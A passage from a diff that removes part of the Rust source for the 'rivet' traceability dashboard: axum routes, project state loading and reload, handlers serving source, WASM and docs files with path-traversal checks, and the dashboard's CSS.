p.file_name().and_then(|n| n.to_str()) { - siblings.push(SiblingProject { - name: name.to_string(), - rel_path: p.display().to_string(), - }); - } - } - } - } - } - } - } - - siblings.sort_by(|a, b| a.name.cmp(&b.name)); - siblings -} - -/// Shared application state loaded once at startup. -struct AppState { - store: Store, - schema: Schema, - graph: LinkGraph, - doc_store: DocumentStore, - result_store: ResultStore, - context: RepoContext, - /// Canonical path to the project directory (for reload). 
- project_path_buf: PathBuf, - /// Path to the schemas directory (for reload). - schemas_dir: PathBuf, - /// Resolved docs directories (for serving images/assets). - doc_dirs: Vec, -} - -/// Convenience alias so handler signatures stay compact. -type SharedState = Arc>; - -/// Build a fresh `AppState` by loading everything from disk. -fn reload_state( - project_path: &std::path::Path, - schemas_dir: &std::path::Path, - port: u16, -) -> Result { - let config_path = project_path.join("rivet.yaml"); - let config = rivet_core::load_project_config(&config_path) - .with_context(|| format!("loading {}", config_path.display()))?; - - let schema = rivet_core::load_schemas(&config.project.schemas, schemas_dir) - .context("loading schemas")?; - - let mut store = Store::new(); - for source in &config.sources { - let artifacts = rivet_core::load_artifacts(source, project_path) - .with_context(|| format!("loading source '{}'", source.path))?; - for artifact in artifacts { - store.upsert(artifact); - } - } - - let graph = LinkGraph::build(&store, &schema); - - let mut doc_store = DocumentStore::new(); - let mut doc_dirs = Vec::new(); - for docs_path in &config.docs { - let dir = project_path.join(docs_path); - if dir.is_dir() { - doc_dirs.push(dir.clone()); - } - let docs = rivet_core::document::load_documents(&dir) - .with_context(|| format!("loading docs from '{docs_path}'"))?; - for doc in docs { - doc_store.insert(doc); - } - } - - let mut result_store = ResultStore::new(); - if let Some(ref results_path) = config.results { - let dir = project_path.join(results_path); - let runs = rivet_core::results::load_results(&dir) - .with_context(|| format!("loading results from '{results_path}'"))?; - for run in runs { - result_store.insert(run); - } - } - - let git = capture_git_info(project_path); - let loaded_at = std::process::Command::new("date") - .arg("+%H:%M:%S") - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| 
String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_else(|| "unknown".into()); - let siblings = discover_siblings(project_path); - let project_name = config.project.name.clone(); - - let context = RepoContext { - project_name, - project_path: project_path.display().to_string(), - git, - loaded_at, - siblings, - port, - }; - - Ok(AppState { - store, - schema, - graph, - doc_store, - result_store, - context, - project_path_buf: project_path.to_path_buf(), - schemas_dir: schemas_dir.to_path_buf(), - doc_dirs, - }) -} - -/// Start the axum HTTP server on the given port. -#[allow(clippy::too_many_arguments)] -pub async fn run( - store: Store, - schema: Schema, - graph: LinkGraph, - doc_store: DocumentStore, - result_store: ResultStore, - project_name: String, - project_path: PathBuf, - schemas_dir: PathBuf, - doc_dirs: Vec, - port: u16, -) -> Result<()> { - let git = capture_git_info(&project_path); - let loaded_at = std::process::Command::new("date") - .arg("+%H:%M:%S") - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_else(|| "unknown".into()); - let siblings = discover_siblings(&project_path); - let context = RepoContext { - project_name, - project_path: project_path.display().to_string(), - git, - loaded_at, - siblings, - port, - }; - - let state: SharedState = Arc::new(RwLock::new(AppState { - store, - schema, - graph, - doc_store, - result_store, - context, - project_path_buf: project_path, - schemas_dir, - doc_dirs, - })); - - let app = Router::new() - .route("/", get(index)) - .route("/artifacts", get(artifacts_list)) - .route("/artifacts/{id}", get(artifact_detail)) - .route("/artifacts/{id}/preview", get(artifact_preview)) - .route("/artifacts/{id}/graph", get(artifact_graph)) - .route("/validate", get(validate_view)) - .route("/matrix", get(matrix_view)) - .route("/graph", get(graph_view)) - .route("/stats", get(stats_view)) - .route("/coverage", 
get(coverage_view)) - .route("/documents", get(documents_list)) - .route("/documents/{id}", get(document_detail)) - .route("/search", get(search_view)) - .route("/verification", get(verification_view)) - .route("/stpa", get(stpa_view)) - .route("/results", get(results_view)) - .route("/results/{run_id}", get(result_detail)) - .route("/source", get(source_tree_view)) - .route("/source/{*path}", get(source_file_view)) - .route("/source-raw/{*path}", get(source_raw)) - .route("/diff", get(diff_view)) - .route("/doc-linkage", get(doc_linkage_view)) - .route("/traceability", get(traceability_view)) - .route("/traceability/history", get(traceability_history)) - .route("/api/links/{id}", get(api_artifact_links)) - .route("/wasm/{*path}", get(wasm_asset)) - .route("/help", get(help_view)) - .route("/help/docs", get(help_docs_list)) - .route("/help/docs/{*slug}", get(help_docs_topic)) - .route("/help/schema", get(help_schema_list)) - .route("/help/schema/{name}", get(help_schema_show)) - .route("/help/links", get(help_links_view)) - .route("/help/rules", get(help_rules_view)) - .route("/docs-asset/{*path}", get(docs_asset)) - .route("/reload", post(reload_handler)) - .with_state(state.clone()) - .layer(axum::middleware::from_fn_with_state(state, wrap_full_page)); - - let addr = format!("0.0.0.0:{port}"); - eprintln!("rivet dashboard listening on http://localhost:{port}"); - - let listener = tokio::net::TcpListener::bind(&addr).await?; - axum::serve(listener, app).await?; - Ok(()) -} - -/// Middleware: for direct browser requests (no HX-Request header) to view routes, -/// wrap the handler's partial HTML in the full page layout. This replaces the old -/// `/?goto=` redirect pattern and fixes query-param loss, hash-fragment loss, and -/// the async replaceState race condition. 
-async fn wrap_full_page( - State(state): State, - req: axum::extract::Request, - next: axum::middleware::Next, -) -> axum::response::Response { - let path = req.uri().path().to_string(); - let is_htmx = req.headers().contains_key("hx-request"); - let method = req.method().clone(); - - let response = next.run(req).await; - - // Only wrap GET requests to view routes (not /, assets, or APIs) - if method == axum::http::Method::GET - && !is_htmx - && path != "/" - && !path.starts_with("/api/") - && !path.starts_with("/wasm/") - && !path.starts_with("/source-raw/") - && !path.starts_with("/docs-asset/") - { - let bytes = axum::body::to_bytes(response.into_body(), 16 * 1024 * 1024) - .await - .unwrap_or_default(); - let content = String::from_utf8_lossy(&bytes); - let app = state.read().await; - return page_layout(&content, &app).into_response(); - } - - response -} - -/// GET /api/links/{id} — return JSON array of AADL-prefixed artifact IDs linked -/// to the given artifact (forward links, backlinks, and self if applicable). -async fn api_artifact_links( - State(state): State, - Path(id): Path, -) -> axum::Json> { - let state = state.read().await; - let graph = &state.graph; - - let mut linked_ids = Vec::new(); - - // Forward links from this artifact - for link in graph.links_from(&id) { - if link.target.starts_with("AADL-") { - linked_ids.push(link.target.clone()); - } - } - - // Backlinks to this artifact - for bl in graph.backlinks_to(&id) { - if bl.source.starts_with("AADL-") { - linked_ids.push(bl.source.clone()); - } - } - - // If this IS an AADL artifact, include self - if id.starts_with("AADL-") { - linked_ids.push(id); - } - - axum::Json(linked_ids) -} - -/// GET /source-raw/{*path} — serve a project file as raw text (for WASM client-side rendering). 
-async fn source_raw( - State(state): State, - Path(raw_path): Path, -) -> impl IntoResponse { - let state = state.read().await; - let project_path = &state.project_path_buf; - let decoded = urlencoding::decode(&raw_path).unwrap_or(std::borrow::Cow::Borrowed(&raw_path)); - let rel_path = decoded.as_ref(); - - let full_path = project_path.join(rel_path); - let canonical = match full_path.canonicalize() { - Ok(p) => p, - Err(_) => { - return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(); - } - }; - let canonical_project = match project_path.canonicalize() { - Ok(p) => p, - Err(_) => { - return (axum::http::StatusCode::INTERNAL_SERVER_ERROR, "error").into_response(); - } - }; - if !canonical.starts_with(&canonical_project) { - return (axum::http::StatusCode::FORBIDDEN, "forbidden").into_response(); - } - - let metadata = match std::fs::symlink_metadata(&full_path) { - Ok(m) => m, - Err(_) => return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), - }; - - // Directory: return JSON listing of filenames. - if metadata.is_dir() { - let mut entries = Vec::new(); - if let Ok(dir) = std::fs::read_dir(&full_path) { - for entry in dir.flatten() { - if let Some(name) = entry.file_name().to_str() { - entries.push(name.to_string()); - } - } - } - entries.sort(); - let json = serde_json::to_string(&entries).unwrap_or_else(|_| "[]".into()); - return ( - axum::http::StatusCode::OK, - [(axum::http::header::CONTENT_TYPE, "application/json")], - json, - ) - .into_response(); - } - - match std::fs::read_to_string(&full_path) { - Ok(content) => ( - axum::http::StatusCode::OK, - [( - axum::http::header::CONTENT_TYPE, - "text/plain; charset=utf-8", - )], - content, - ) - .into_response(), - Err(_) => (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), - } -} - -/// GET /wasm/{*path} — serve jco-transpiled WASM assets for browser-side rendering. 
-async fn wasm_asset(Path(path): Path) -> impl IntoResponse { - let content_type = if path.ends_with(".js") { - "application/javascript" - } else if path.ends_with(".wasm") { - "application/wasm" - } else if path.ends_with(".d.ts") { - "application/typescript" - } else { - "application/octet-stream" - }; - - // Try embedded assets first (when built with embed-wasm feature). - #[cfg(feature = "embed-wasm")] - { - let bytes: Option<&[u8]> = match path.as_str() { - "spar_wasm.js" => Some(embedded_wasm::SPAR_JS.as_bytes()), - "spar_wasm.core.wasm" => Some(embedded_wasm::CORE_WASM), - "spar_wasm.core2.wasm" => Some(embedded_wasm::CORE2_WASM), - "spar_wasm.core3.wasm" => Some(embedded_wasm::CORE3_WASM), - _ => None, - }; - if let Some(data) = bytes { - return ( - axum::http::StatusCode::OK, - [ - (axum::http::header::CONTENT_TYPE, content_type), - (axum::http::header::CACHE_CONTROL, "public, max-age=86400"), - ], - data.to_vec(), - ) - .into_response(); - } - } - - // Fallback to filesystem (development mode). - // Try the workspace assets dir first, then next to the binary. - let candidates = [ - std::env::current_dir() - .unwrap_or_default() - .join("rivet-cli/assets/wasm/js") - .join(&path), - std::env::current_exe() - .unwrap_or_default() - .parent() - .unwrap_or(std::path::Path::new(".")) - .join("assets/wasm/js") - .join(&path), - ]; - - for candidate in &candidates { - if let Ok(bytes) = std::fs::read(candidate) { - return ( - axum::http::StatusCode::OK, - [ - (axum::http::header::CONTENT_TYPE, content_type), - (axum::http::header::CACHE_CONTROL, "no-cache"), - ], - bytes, - ) - .into_response(); - } - } - - ( - axum::http::StatusCode::NOT_FOUND, - [(axum::http::header::CONTENT_TYPE, "text/plain")], - format!("WASM asset not found: {path}").into_bytes(), - ) - .into_response() -} - -/// POST /reload — re-read the project from disk and replace the shared state. 
-/// -/// Uses the `HX-Current-URL` header (sent automatically by HTMX) to redirect -/// back to the current page after reload, preserving the user's position. -async fn reload_handler( - State(state): State, - headers: axum::http::HeaderMap, -) -> impl IntoResponse { - let (project_path, schemas_dir, port) = { - let guard = state.read().await; - ( - guard.project_path_buf.clone(), - guard.schemas_dir.clone(), - guard.context.port, - ) - }; - - match reload_state(&project_path, &schemas_dir, port) { - Ok(new_state) => { - let mut guard = state.write().await; - *guard = new_state; - - // Redirect back to wherever the user was (HTMX sends HX-Current-URL). - // Extract the path portion from the full URL (e.g. "http://localhost:3001/documents/DOC-001" → "/documents/DOC-001"). - // Navigate back to wherever the user was (HTMX sends HX-Current-URL). - // HX-Location does a client-side HTMX navigation (fetch + swap + push-url). - let redirect_url = headers - .get("HX-Current-URL") - .and_then(|v| v.to_str().ok()) - .and_then(|full_url| { - full_url - .find("://") - .and_then(|i| full_url[i + 3..].find('/')) - .map(|j| { - let start = full_url.find("://").unwrap() + 3 + j; - full_url[start..].to_owned() - }) - }) - .unwrap_or_else(|| "/".to_owned()); - - let location_json = format!( - "{{\"path\":\"{}\",\"target\":\"#content\"}}", - redirect_url.replace('"', "\\\"") - ); - - ( - axum::http::StatusCode::OK, - [("HX-Location", location_json)], - "reloaded".to_owned(), - ) - } - Err(e) => { - eprintln!("reload error: {e:#}"); - ( - axum::http::StatusCode::INTERNAL_SERVER_ERROR, - [( - "HX-Location", - "{\"path\":\"/\",\"target\":\"#content\"}".to_owned(), - )], - format!("reload failed: {e}"), - ) - } - } -} - -/// GET /docs-asset/{*path} — serve static files (images, SVG, etc.) from docs directories. 
-async fn docs_asset( - State(state): State, - Path(path): Path, -) -> impl IntoResponse { - let state = state.read().await; - - // Sanitize: reject path traversal - if path.contains("..") { - return ( - axum::http::StatusCode::BAD_REQUEST, - [("Content-Type", "text/plain")], - Vec::new(), - ); - } - - // Search through all doc directories for the requested file - for dir in &state.doc_dirs { - let file_path = dir.join(&path); - if file_path.is_file() { - if let Ok(bytes) = std::fs::read(&file_path) { - let content_type = - match file_path.extension().and_then(|e| e.to_str()).unwrap_or("") { - "png" => "image/png", - "jpg" | "jpeg" => "image/jpeg", - "gif" => "image/gif", - "svg" => "image/svg+xml", - "webp" => "image/webp", - "pdf" => "application/pdf", - _ => "application/octet-stream", - }; - return ( - axum::http::StatusCode::OK, - [("Content-Type", content_type)], - bytes, - ); - } - } - } - - ( - axum::http::StatusCode::NOT_FOUND, - [("Content-Type", "text/plain")], - b"not found".to_vec(), - ) -} - -// ── Color palette ──────────────────────────────────────────────────────── - -fn type_color_map() -> HashMap { - let pairs: &[(&str, &str)] = &[ - // STPA - ("loss", "#dc3545"), - ("hazard", "#fd7e14"), - ("system-constraint", "#20c997"), - ("controller", "#6f42c1"), - ("uca", "#e83e8c"), - ("control-action", "#17a2b8"), - ("feedback", "#6610f2"), - ("causal-factor", "#d63384"), - ("safety-constraint", "#20c997"), - ("loss-scenario", "#e83e8c"), - ("controller-constraint", "#20c997"), - ("controlled-process", "#6610f2"), - ("sub-hazard", "#fd7e14"), - // ASPICE - ("stakeholder-req", "#0d6efd"), - ("system-req", "#0dcaf0"), - ("system-architecture", "#198754"), - ("sw-req", "#198754"), - ("sw-architecture", "#0d6efd"), - ("sw-detailed-design", "#6610f2"), - ("sw-unit", "#6f42c1"), - ("system-verification", "#6610f2"), - ("sw-verification", "#6610f2"), - ("system-integration-verification", "#6610f2"), - ("sw-integration-verification", "#6610f2"), - 
("sw-unit-verification", "#6610f2"), - ("qualification-verification", "#6610f2"), - // Dev - ("requirement", "#0d6efd"), - ("design-decision", "#198754"), - ("feature", "#6f42c1"), - // Cybersecurity - ("asset", "#ffc107"), - ("threat", "#dc3545"), - ("cybersecurity-req", "#fd7e14"), - ("vulnerability", "#e83e8c"), - ("attack-path", "#dc3545"), - ("cybersecurity-goal", "#0d6efd"), - ("cybersecurity-control", "#198754"), - ("security-verification", "#6610f2"), - ("risk-assessment", "#fd7e14"), - ("security-event", "#e83e8c"), - ]; - pairs - .iter() - .map(|(k, v)| (k.to_string(), v.to_string())) - .collect() -} - -/// Return a colored badge `` for an artifact type. -/// -/// Uses the `type_color_map` hex color as text and computes a 12%-opacity -/// tinted background from it. -fn badge_for_type(type_name: &str) -> String { - let colors = type_color_map(); - let hex = colors - .get(type_name) - .map(|s| s.as_str()) - .unwrap_or("#5b2d9e"); - // Parse hex → rgb - let hex_digits = hex.trim_start_matches('#'); - let r = u8::from_str_radix(&hex_digits[0..2], 16).unwrap_or(91); - let g = u8::from_str_radix(&hex_digits[2..4], 16).unwrap_or(45); - let b = u8::from_str_radix(&hex_digits[4..6], 16).unwrap_or(158); - format!( - "{}", - html_escape(type_name) - ) -} - -// ── CSS ────────────────────────────────────────────────────────────────── - -const CSS: &str = r#" -/* ── Reset & base ─────────────────────────────────────────────── */ -*,*::before,*::after{box-sizing:border-box;margin:0;padding:0} -:root{ - --bg: #f5f5f7; - --surface:#fff; - --sidebar:#0f0f13; - --sidebar-hover:#1c1c24; - --sidebar-text:#9898a6; - --sidebar-active:#fff; - --text: #1d1d1f; - --text-secondary:#6e6e73; - --border: #e5e5ea; - --accent: #3a86ff; - --accent-hover:#2568d6; - --radius: 10px; - --radius-sm:6px; - --shadow: 0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04); - --shadow-md:0 4px 12px rgba(0,0,0,.06),0 1px 3px rgba(0,0,0,.04); - --mono: 'JetBrains Mono','Fira Code','SF 
Mono',Menlo,monospace; - --font: 'Atkinson Hyperlegible',system-ui,-apple-system,sans-serif; - --transition:180ms ease; -} -html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-rendering:optimizeLegibility} -body{font-family:var(--font);color:var(--text);background:var(--bg);line-height:1.6;font-size:15px} - -/* ── Links ────────────────────────────────────────────────────── */ -a{color:var(--accent);text-decoration:none;transition:color var(--transition)} -a:hover{color:var(--accent-hover)} -a:focus-visible{outline:2px solid var(--accent);outline-offset:2px;border-radius:3px} - -/* ── Shell layout ─────────────────────────────────────────────── */ -.shell{display:flex;min-height:100vh} -.content-area{display:flex;flex-direction:column;flex:1;min-width:0} - -/* ── Sidebar navigation ──────────────────────────────────────── */ -nav{width:232px;background:var(--sidebar);color:var(--sidebar-text); - padding:1.75rem 1rem;flex-shrink:0;display:flex;flex-direction:column; - position:sticky;top:0;height:100vh;overflow-y:auto; - border-right:1px solid rgba(255,255,255,.06)} -nav h1{font-size:1.05rem;font-weight:700;color:var(--sidebar-active); - margin-bottom:2rem;letter-spacing:.04em;padding:0 .75rem; - display:flex;align-items:center;gap:.5rem} -nav h1::before{content:'';display:inline-block;width:8px;height:8px; - border-radius:50%;background:var(--accent);flex-shrink:0} -nav ul{list-style:none;display:flex;flex-direction:column;gap:2px} -nav li{margin:0} -nav a{display:flex;align-items:center;gap:.5rem;padding:.5rem .75rem;border-radius:var(--radius-sm); - color:var(--sidebar-text);font-size:.875rem;font-weight:500; - transition:all var(--transition)} -nav a:hover{background:var(--sidebar-hover);color:var(--sidebar-active);text-decoration:none} -nav a.active{background:rgba(58,134,255,.08);color:var(--sidebar-active);border-left:2px solid var(--accent);padding-left:calc(.75rem - 2px)} -nav a:focus-visible{outline:2px solid 
var(--accent);outline-offset:-2px} - -/* ── Main content ─────────────────────────────────────────────── */ -main{flex:1;padding:2.5rem 3rem;max-width:1400px;min-width:0;overflow-y:auto} -main.htmx-swapping{opacity:.4;transition:opacity 150ms ease-out} -main.htmx-settling{opacity:1;transition:opacity 200ms ease-in} - -/* ── Loading bar ──────────────────────────────────────────────── */ -#loading-bar{position:fixed;top:0;left:0;width:0;height:2px;background:var(--accent); - z-index:9999;transition:none;pointer-events:none} -#loading-bar.active{width:85%;transition:width 8s cubic-bezier(.1,.05,.1,1)} -#loading-bar.done{width:100%;transition:width 100ms ease;opacity:0;transition:width 100ms ease,opacity 300ms ease 100ms} - -/* ── Typography ───────────────────────────────────────────────── */ -h2{font-size:1.4rem;font-weight:700;margin-bottom:1.25rem;color:var(--text);letter-spacing:-.01em;padding-bottom:.75rem;border-bottom:1px solid var(--border)} -h3{font-size:1.05rem;font-weight:600;margin:1.5rem 0 .75rem;color:var(--text)} -code,pre{font-family:var(--mono);font-size:.85em} -pre{background:#f1f1f3;padding:1rem;border-radius:var(--radius-sm);overflow-x:auto} - -/* ── Tables ───────────────────────────────────────────────────── */ -table{width:100%;border-collapse:collapse;margin-bottom:1.5rem;font-size:.9rem} -th,td{text-align:left;padding:.65rem .875rem} -th{font-weight:600;font-size:.75rem;text-transform:uppercase;letter-spacing:.06em; - color:var(--text-secondary);border-bottom:2px solid var(--border);background:transparent} -td{border-bottom:1px solid var(--border)} -tbody tr{transition:background var(--transition)} -tbody tr:nth-child(even){background:rgba(0,0,0,.015)} -tbody tr:hover{background:rgba(58,134,255,.04)} -.tbl-filter-wrap{margin-bottom:.5rem} -.tbl-filter{width:100%;max-width:20rem;padding:.4rem .65rem;font-size:.85rem;font-family:var(--mono); - border:1px solid var(--border);border-radius:5px;background:var(--surface);color:var(--text); - 
outline:none;transition:border-color var(--transition)} -.tbl-filter:focus{border-color:var(--accent)} -.tbl-sort-arrow{font-size:.7rem;opacity:.6;margin-left:.25rem} -th:hover .tbl-sort-arrow{opacity:1} -td a{font-family:var(--mono);font-size:.85rem;font-weight:500} - -/* ── Badges ───────────────────────────────────────────────────── */ -.badge{display:inline-flex;align-items:center;padding:.2rem .55rem;border-radius:5px; - font-size:.73rem;font-weight:600;letter-spacing:.02em;line-height:1.4;white-space:nowrap} -.badge-error{background:#fee;color:#c62828} -.badge-warn{background:#fff8e1;color:#8b6914} -.badge-info{background:#e8f4fd;color:#0c5a82} -.badge-ok{background:#e6f9ed;color:#15713a} -.badge-type{background:#f0ecf9;color:#5b2d9e;font-family:var(--mono);font-size:.72rem} - -/* ── Validation bar ──────────────────────────────────────────── */ -.validation-bar{padding:1rem 1.25rem;border-radius:var(--radius);margin-bottom:1.25rem;font-weight:600;font-size:.95rem} -.validation-bar.pass{background:linear-gradient(135deg,#e6f9ed,#d4f5e0);color:#15713a;border:1px solid #b8e8c8} -.validation-bar.fail{background:linear-gradient(135deg,#fee,#fdd);color:#c62828;border:1px solid #f4c7c3} - -/* ── Status progress bars ────────────────────────────────────── */ -.status-bar-row{display:flex;align-items:center;gap:.75rem;margin-bottom:.5rem;font-size:.85rem} -.status-bar-label{width:80px;text-align:right;font-weight:500;color:var(--text-secondary)} -.status-bar-track{flex:1;height:20px;background:#e5e5ea;border-radius:4px;overflow:hidden;position:relative} -.status-bar-fill{height:100%;border-radius:4px;transition:width .3s ease} -.status-bar-count{width:40px;font-variant-numeric:tabular-nums;color:var(--text-secondary)} - -/* ── Cards ────────────────────────────────────────────────────── */ -.card{background:var(--surface);border-radius:var(--radius);padding:1.5rem; - margin-bottom:1.25rem;box-shadow:var(--shadow);border:1px solid var(--border); - 
transition:box-shadow var(--transition)} - -/* ── Stat grid ────────────────────────────────────────────────── */ -.stat-grid{display:grid;grid-template-columns:repeat(auto-fill,minmax(160px,1fr));gap:1rem;margin-bottom:1.75rem} -.stat-box{background:var(--surface);border-radius:var(--radius);padding:1.25rem 1rem;text-align:center; - box-shadow:var(--shadow);border:1px solid var(--border);transition:box-shadow var(--transition),transform var(--transition); - border-top:3px solid var(--border)} -.stat-box:hover{box-shadow:var(--shadow-md);transform:translateY(-1px)} -.stat-box .number{font-size:2rem;font-weight:800;letter-spacing:-.02em; - font-variant-numeric:tabular-nums;line-height:1.2} -.stat-box .label{font-size:.8rem;font-weight:500;color:var(--text-secondary);margin-top:.25rem; - text-transform:uppercase;letter-spacing:.04em} -.stat-blue{border-top-color:#3a86ff}.stat-blue .number{color:#3a86ff} -.stat-green{border-top-color:#15713a}.stat-green .number{color:#15713a} -.stat-orange{border-top-color:#e67e22}.stat-orange .number{color:#e67e22} -.stat-red{border-top-color:#c62828}.stat-red .number{color:#c62828} -.stat-amber{border-top-color:#b8860b}.stat-amber .number{color:#b8860b} -.stat-purple{border-top-color:#6f42c1}.stat-purple .number{color:#6f42c1} - -/* ── Link pills ───────────────────────────────────────────────── */ -.link-pill{display:inline-block;padding:.15rem .45rem;border-radius:4px; - font-size:.76rem;font-family:var(--mono);background:#f0f0f3; - color:var(--text-secondary);margin:.1rem;font-weight:500} - -/* ── Forms ────────────────────────────────────────────────────── */ -.form-row{display:flex;gap:1rem;align-items:end;flex-wrap:wrap;margin-bottom:1rem} -.form-row label{font-size:.8rem;font-weight:600;color:var(--text-secondary); - text-transform:uppercase;letter-spacing:.04em} -.form-row select,.form-row input[type="text"],.form-row input[type="search"], -.form-row input:not([type]),.form-row input[list]{ - padding:.5rem .75rem;border:1px 
solid var(--border);border-radius:var(--radius-sm); - font-size:.875rem;font-family:var(--font);background:var(--surface);color:var(--text); - transition:border-color var(--transition),box-shadow var(--transition);appearance:none; - -webkit-appearance:none} -.form-row select{padding-right:2rem;background-image:url("data:image/svg+xml,%3Csvg width='10' height='6' viewBox='0 0 10 6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1 1l4 4 4-4' stroke='%236e6e73' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/svg%3E"); - background-repeat:no-repeat;background-position:right .75rem center} -.form-row input:focus,.form-row select:focus{ - outline:none;border-color:var(--accent);box-shadow:0 0 0 3px rgba(58,134,255,.15)} -.form-row input[type="range"]{padding:0;border:none;accent-color:var(--accent);width:100%} -.form-row input[type="range"]:focus{box-shadow:none} -.form-row button{padding:.5rem 1.25rem;background:var(--accent);color:#fff;border:none; - border-radius:var(--radius-sm);font-size:.875rem;font-weight:600; - font-family:var(--font);cursor:pointer;transition:all var(--transition); - box-shadow:0 1px 2px rgba(0,0,0,.08)} -.form-row button:hover{background:var(--accent-hover);box-shadow:0 2px 6px rgba(58,134,255,.25);transform:translateY(-1px)} -.form-row button:active{transform:translateY(0)} -.form-row button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} - -/* ── Definition lists ─────────────────────────────────────────── */ -dl{margin:.75rem 0} -dt{font-weight:600;font-size:.8rem;color:var(--text-secondary);margin-top:.75rem; - text-transform:uppercase;letter-spacing:.04em} -dd{margin-left:0;margin-bottom:.25rem;margin-top:.2rem} - -/* ── Meta text ────────────────────────────────────────────────── */ -.meta{color:var(--text-secondary);font-size:.85rem} - -/* ── Nav icons & badges ───────────────────────────────────────── */ 
-.nav-icon{display:inline-flex;width:1.25rem;height:1.25rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.5} -nav a:hover .nav-icon,nav a.active .nav-icon{opacity:.9} -.nav-label{display:flex;align-items:center;gap:.5rem;flex:1;min-width:0} -.nav-badge{font-size:.65rem;font-weight:700;padding:.1rem .4rem;border-radius:4px; - background:rgba(255,255,255,.08);color:rgba(255,255,255,.4);margin-left:auto;flex-shrink:0} -.nav-badge-error{background:rgba(220,53,69,.2);color:#ff6b7a} -nav .nav-divider{height:1px;background:rgba(255,255,255,.06);margin:.75rem .75rem} - -/* ── Context bar ─────────────────────────────────────────────── */ -.context-bar{display:flex;align-items:center;gap:.75rem;padding:.5rem 1.5rem; - background:var(--surface);border-bottom:1px solid var(--border);font-size:.78rem;color:var(--text-secondary); - flex-wrap:wrap} -.context-bar .ctx-project{font-weight:700;color:var(--text);font-size:.82rem} -.context-bar .ctx-sep{opacity:.25} -.context-bar .ctx-git{font-family:var(--mono);font-size:.72rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(58,134,255,.08);color:var(--accent)} -.context-bar .ctx-dirty{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(220,53,69,.1);color:#c62828} -.context-bar .ctx-clean{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(21,113,58,.1);color:#15713a} -.context-bar .ctx-time{margin-left:auto;opacity:.6} -.ctx-switcher{position:relative;display:inline-flex;align-items:center} -.ctx-switcher-details{position:relative} -.ctx-switcher-details summary{cursor:pointer;list-style:none;display:inline-flex;align-items:center; - padding:.15rem .35rem;border-radius:4px;opacity:.5;transition:opacity .15s} -.ctx-switcher-details summary:hover{opacity:1;background:rgba(255,255,255,.06)} -.ctx-switcher-details summary::-webkit-details-marker{display:none} 
-.ctx-switcher-dropdown{position:absolute;top:100%;left:0;z-index:100;margin-top:.35rem; - background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-sm); - padding:.5rem;min-width:280px;box-shadow:0 8px 24px rgba(0,0,0,.35)} -.ctx-switcher-item{padding:.5rem .65rem;border-radius:4px} -.ctx-switcher-item:hover{background:rgba(255,255,255,.04)} -.ctx-switcher-item .ctx-switcher-name{display:block;font-weight:600;font-size:.8rem;color:var(--text);margin-bottom:.2rem} -.ctx-switcher-item .ctx-switcher-cmd{display:block;font-size:.7rem;color:var(--text-secondary); - padding:.2rem .4rem;background:rgba(255,255,255,.04);border-radius:3px; - font-family:var(--mono);user-select:all;cursor:text} - -/* ── Footer ──────────────────────────────────────────────────── */ -.footer{padding:2rem 0 1rem;text-align:center;font-size:.75rem;color:var(--text-secondary); - border-top:1px solid var(--border);margin-top:3rem} - -/* ── Verification ────────────────────────────────────────────── */ -.ver-level{margin-bottom:1.5rem} -.ver-level-header{display:flex;align-items:center;gap:.75rem;margin-bottom:.75rem} -.ver-level-title{font-size:1rem;font-weight:600;color:var(--text)} -.ver-level-arrow{color:var(--text-secondary);font-size:.85rem} -details.ver-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); - display:flex;align-items:center;gap:.75rem;transition:background var(--transition)} -details.ver-row>summary::-webkit-details-marker{display:none} -details.ver-row>summary:hover{background:rgba(58,134,255,.04)} -details.ver-row[open]>summary{background:rgba(58,134,255,.04);border-bottom-color:var(--accent)} -details.ver-row>.ver-detail{padding:1rem 1.5rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border)} -.ver-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4} -details.ver-row[open] .ver-chevron{transform:rotate(90deg)} 
-.ver-steps{width:100%;border-collapse:collapse;font-size:.85rem;margin-top:.5rem} -.ver-steps th{text-align:left;font-weight:600;font-size:.72rem;text-transform:uppercase; - letter-spacing:.04em;color:var(--text-secondary);padding:.4rem .5rem;border-bottom:1px solid var(--border)} -.ver-steps td{padding:.4rem .5rem;border-bottom:1px solid rgba(0,0,0,.04);vertical-align:top} -.method-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600; - background:#e8f4fd;color:#0c5a82} - -/* ── Results ─────────────────────────────────────────────────── */ -.result-pass{color:#15713a}.result-fail{color:#c62828}.result-skip{color:#6e6e73} -.result-error{color:#e67e22}.result-blocked{color:#8b6914} -.result-dot{display:inline-block;width:8px;height:8px;border-radius:50%;margin-right:.35rem} -.result-dot-pass{background:#15713a}.result-dot-fail{background:#c62828} -.result-dot-skip{background:#c5c5cd}.result-dot-error{background:#e67e22}.result-dot-blocked{background:#b8860b} - -/* ── Diff ────────────────────────────────────────────────────── */ -.diff-added{background:rgba(21,113,58,.08)} -.diff-removed{background:rgba(198,40,40,.08)} -.diff-modified{background:rgba(184,134,11,.08)} -.diff-icon{display:inline-flex;align-items:center;justify-content:center;width:1.5rem;height:1.5rem; - border-radius:4px;font-size:.85rem;font-weight:700;flex-shrink:0;margin-right:.35rem} -.diff-icon-add{background:rgba(21,113,58,.12);color:#15713a} -.diff-icon-remove{background:rgba(198,40,40,.12);color:#c62828} -.diff-icon-modify{background:rgba(184,134,11,.12);color:#b8860b} -.diff-summary{display:flex;gap:1.25rem;padding:.75rem 